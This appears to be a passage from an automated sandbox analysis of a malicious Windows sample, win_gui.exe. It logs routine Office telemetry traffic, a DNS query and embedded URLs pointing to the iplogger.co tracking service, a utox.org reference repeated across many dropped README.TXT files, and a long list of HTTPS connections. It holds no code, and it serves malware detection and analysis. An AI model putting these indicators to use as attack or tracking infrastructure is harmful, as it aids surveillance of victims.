Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficDNS traffic detected: DNS query: iplogger.co
Source: jfr.jar.0.drString found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature
Source: win_gui.exe.exe, 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp, README.TXT48.0.dr, README.TXT271.0.dr, README.TXT262.0.dr, README.TXT404.0.dr, README.TXT582.0.dr, README.TXT629.0.dr, README.TXT541.0.dr, README.TXT574.0.dr, README.TXT555.0.dr, README.TXT374.0.dr, README.TXT586.0.dr, README.TXT243.0.dr, README.TXT382.0.dr, README.TXT200.0.dr, README.TXT669.0.dr, README.TXT391.0.dr, README.TXT418.0.dr, README.TXT350.0.dr, README.TXT127.0.dr, README.TXT333.0.drString found in binary or memory: http://utox.org
Source: jfr.jar.0.drString found in binary or memory: http://www.oracle.com/hotspot/jdk/
Source: jfr.jar.0.drString found in binary or memory: http://www.oracle.com/hotspot/jfr-info/
Source: jfr.jar.0.drString found in binary or memory: http://www.oracle.com/hotspot/jvm/
Source: win_gui.exe.exe, 00000000.00000002.4484132134.0000000007B0A000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481554175.0000000001651000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481316695.00000000015E2000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4482295362.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.co/
Source: win_gui.exe.exe, 00000000.00000002.4481316695.00000000015E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.co/155qJ4.torrent
Source: win_gui.exe.exe, 00000000.00000002.4482350429.000000000562D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.co/155qJ4.torrent5
Source: win_gui.exe.exe, 00000000.00000003.2450063743.000000000163A000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000003.2438730506.000000000162D000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481554175.000000000163D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.co/155qJ4.torrent9
Source: win_gui.exe.exe, 00000000.00000002.4487317189.00000000082CB000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481316695.00000000015E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.co/155qJ4.torrent;
Source: win_gui.exe.exe, 00000000.00000002.4481316695.00000000015E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.co/155qJ4.torrentG
Source: win_gui.exe.exe, 00000000.00000002.4482350429.000000000562D000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481037911.00000000012FB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://iplogger.co/155qJ4.torrente
Source: win_gui.exe.exe, 00000000.00000002.4482350429.000000000562D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.co/155qJ4.torrentgb
Source: win_gui.exe.exe, 00000000.00000002.4484132134.0000000007B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.co/ces
Source: win_gui.exe.exe, 00000000.00000002.4484132134.0000000007B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.co/fests
Source: win_gui.exe.exe, 00000000.00000002.4484132134.0000000007B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.co/ram
Source: win_gui.exe.exeString found in binary or memory: https://www.openssl.org/docs/faq.html
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50210 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50221 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 443
